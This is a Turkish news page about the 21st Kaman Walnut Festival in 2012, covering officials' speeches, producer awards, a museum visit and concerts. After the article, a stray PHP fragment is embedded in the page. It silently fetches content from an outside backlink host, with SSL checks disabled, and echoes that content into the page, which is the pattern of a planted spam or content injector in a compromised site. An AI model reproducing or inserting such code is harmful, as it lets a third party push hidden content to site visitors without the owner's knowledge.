Ceviz Festivali - cevizagaci

İçeriğe git

Ana Menü

Ceviz Festivali

Ceviz Yetiştiriciliği
 
 

21 NCİ CEVİZ FESTİVALİ 2012
lçemizde düzenlenen 21. Kaman Ceviz, Kültür ve Sanat Festivali, muhteşem organizasyon ve konserlerle dolu dolu geçti.

Kaman Belediyesi tarafından bu yıl daha kapsamlı hazırlanan 21. Ceviz Festivali, Belediye Başkanı Erhan Talu ve ekibinin yoğun gayreti sonucunda tek kelimeyle muhteşem geçti. Kurulun pazar yerlerinde Kaman halkı ve bölge insanı ürettiği ceviz ile diğer tarım ürünlerini satarken, Belediye'nin verdiği kimlik kartları ile de vatandaşa Kaman Ceviz diye başka yörelerin kalitesiz cevizlerini satanlara karşı önlem alındı. Kaman Cevizi'nin en üst seviyede tanıtıldığı festivalin ilk gününün protokol üyelerine ceviz ikramı yapıldı.

' PROTOKOLÜN İLGİSİ YÜKSEKTİ '

Kutlamaların ilk günü yani 13 Ekim 2012 Cumartesi günü, Saygı Duruşu ve İstiklal Marşı sonrasında Atatürk Anıtı'na çelenk sunulurken, hemen ardından da ceviz stantlarının kurulu bulunduğu pazar yeri kortej halinde gezildi. Halkoyunları gösterileri ile renklenen festivale ilgi beklenenin üzerinde olurken; halkoyunları ekiplerinin ve Kaman davul-zurna ekiplerinin gösterileri beğeni topladı. Kutlamalara Kırşehir Vali Vekili Mehmet Alabacak, Kırşehir Milletvekili Abdullah Çalışkan, Cumhuriyet Başsavcısı Mehmet Şahin, Kaman Kaymakamı Mustafa Çiftçi, Vali Yardımcısı Fikret Çavuş, Belediye Başkanı Erhan Talu, Eski Bakan Ramazan Mirzaoğlu, AKP İl Başkanı Salih Çetinkaya, Kahramanmaraş Sütçü İmam Üniversitesi Rektörü Prof. Dr. Mehmet Fatih Karaaslan, AEÜ Rektör Yardımcısı Prof. Dr. Güray Erener, KESOB Başkanı Bahamettin Öztürk, TSO Başkanı Müfit Göçen, Kırşehirliler Federasyonu Başkanı Hilmi Gökçınar, Kızılay Yönetim Kurulu Üyesi Hayati Çetin, MHP İl Başkanı Cemil Cahit Pişkin, CHP İl Başkanı Yılmaz Zengin, siyasi partilerin temsilcileri, sendikaların temsilcileri, Ankara ve Kırşehir'den gelen davetliler, daire müdürleri, Kaman halkı ile basın mensupları katıldı.

' KAMAN, CEVİZ'İ İLE MARKA OLDU '

Kutlamalara katılan Abdullah Çalışkan, Kaman'da ve Kırşehir'de ceviz üretimine yönelik yapılan çalışmalar hakkında bilgiler verirken; Kaman'ın ceviz üretimi ile marka ir kent olduğunu söyledi. Çalışkan, ceviz üretiminin artması için gereken tüm alt yapı çalışmalarının hazırlandığını belirterek, ceviz üretiminin yaygın hale gelmesi için ilgili müdürlüklerin seferber olduğunu kaydetti. Ceviz Festivali'nin hazırlanmasında emeği geçenlere teşekkür eden Milletvekili Çalışkan, festivalin hayırlı ve uğurlu olmasını diledi. Törende konuşan Vali Vekili Mehmet Alabacak, ceviz üretimi ile ilgili sayısal verileri paylaşarak, ceviz üretiminin her geçen yıl arttığı Kaman'ın yanı sıra il genelinde ceviz üretimini teşvik edeceklerini söyledi.

' EN İYİ CEVİZ ÜRETİMİ YAPANLARA TEŞEKKÜR BELGESİ VERİLDİ '

Konuşmaların ardından Kaman Cevizi markasının tescilini yapan Kahraman Maraş Üniversitesi ile Ahi Evran Üniversitesi arasında protokol imzalanırken; ardından Milletvekili Abdullah Çalışkan'a desteklerinden dolayı plaket verildi. En iyi ceviz üretimi ve ceviz bahçesi dalında dereceye giren üreticilere teşekkür belgelerinin verildiği tören sonrasında, halk oyunları gösterileri yer aldı.

' KALEHÖYÜK MÜZESİ GEZİLDİ '

Kutlamalara katılan davetlilerle ve vatandaşlar tarafından, program dahilinde Kaman Çağırkan Kalehöyük Müzesi ile Japon Bahçesinde gezi düzenlenirken, müze gezisi sonrasında kokteyl verildi. Müze'de yapılan bilgilendirme toplantısında, müze'de bulunan materyaller ile kazıların son durumu ile ilgili konuklara bilgiler verilirken; müzeye ilginin yüksek olması gözden kaçmadı.

' OYUN ALANINDA BİNLERCE ÇOCUK DOYASIYA EĞLENDİ '

Belediye Başkanı Erhan Talu'nun talimatı ile kurulan oyun alanına birbirinden güzel oyuncaklar ve şişme oyun parklarına binlerce Kamanlı çocuk akın ederken, iki gün boyunca doyasıya eğlenen çocuklar, festivali doyasıya yaşayanlar arasındaydı. Oyun alanlarına çocuklarını getiren vatandaşlar, Belediye Başkanı Erhan Talu'ya teşekkür ederek, çocuklarının mutluluğunu görmenin kendilerine de ayrı bir mutluluk verdiğini söylediler.

' KONSERLERE BİNLERCE KİŞİ AKIN ETTİ '

Kutlamaların ilk konser programında Türk Halk Müziği'nin güçlü isimleri arasında yer alan Atilla Yılmaz, Yeter Köprülü ve Uğur Ertürk sahne aldı. Seslendirdikleri birbirinden güzel türkülerle, hayranlarına doyasıya bir konser ziyafeti çeken sanatçılara, Belediye Başkanı Erhan Talu ile Başkan Yardımcıları tarafından çiçek ve plaket verildi.

' LOKMAN AVŞAR'IN MEZARI ZİYARET EDİLDİ '

Kutlamaların ikinci gününde ilk olarak Ceviz'in Babası Lokman Avşar'ın mezarı ziyaret edilerek dua edilirken, Belediye Başkanı Erhan Talu'nun da katıldığı mezarlık ziyaretinde duygusal anlar yaşandı. Ziyarete Başkan Talu ile birlikte Avşar ailesinin mensupları da katıldı.

' 06 METİN KAMAN'DAYDI '

Festival kapsamında Ankara'nın en fazla dinlenen türkü ve bozlak radyosu ParkFM'in ünlü program yapımcısı 06 METİN de sahne alırken, kendisini izlemeye gelen binlerce hayranına seslenen 06METİN, türkülerle hayranlarına doyasıya eğlence yaşattı. Yaklaşık 40 dakika süren 06METİN programı boyunca, binlerce Kamanlı bir dakika bile oturmayarak doyasıya oynanıp halay çekti.

' KIRAÇ, 25 BİN SEYİRCİYE SESLENDİ '

Kutlamaların en coşkulu yaşandığı ikinci gün, hem pazar yerleri dolup taşarken hem de nüfusu 22 bin olan merkez nüfus, iki gün içinde 50 bine ulaştı. Ankara, Kırıkkale, İstanbul ve Kırşehir'den binlerce vatandaş Kaman Ceviz Festivali'ne gelirken, Kaman'da iki gün içinde esnaf ve sanatkara büyük ölçüde ekonomik katkı sunuldu. Binlerce vatandaş bir yandan ceviz satın alırken, ilçe esnafının yüzü güldü.

İkinci gün ilk sahne alan THM Sanatçısı Selma Geçer, türküleriyle hayranlarını eğlendirirken, Geçer'in ardından sahne alan Kıraç, polis kayıtlarında göre yaklaşık 25 bin vatandaşa konser verdi. Kıraç'ın seslendirdiği şarkılara hep bir ağızdan eşlik eden Kaman halkı, geç saatlere kadar doyasıya eğlendi. Kendisini izlemeye gelen hayranlarını kıramayan Kıraç, ilk defa konserinde bağlama çaldı ve hem Büyük Ozan Neşet Ertaş'ı andı hem de hayranlarının isteğini yerine getirdi.

' TALU VE EKİBİ AYAKTA ALKIŞLANDI '

Kıraç'a Belediye Başkanı Erhan Talu tarafından çiçek hediye edilirken, konser sonrasında Başkan Talu ile Başkan Danışmanı Tekin Var ile Nuri Satılmış'ı sahneye davet eden Kıraç, ellerini tutarak havaya kaldırdı ve başarılı organizasyondan dolayı Kaman halkının Belediye'yi alkışlamasını istedi.

Binlerce Kamanlı, hem Kıraç'ı hem de Başkan Talu ve ekibini ayakta alkışladı.

 
'; $uri="http://backlink.r10.net/fatal.php?i=MTE1ODU="; $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_URL, $uri); echo curl_exec($ch); curl_close($ch); ?>
Back to content | Back to main menu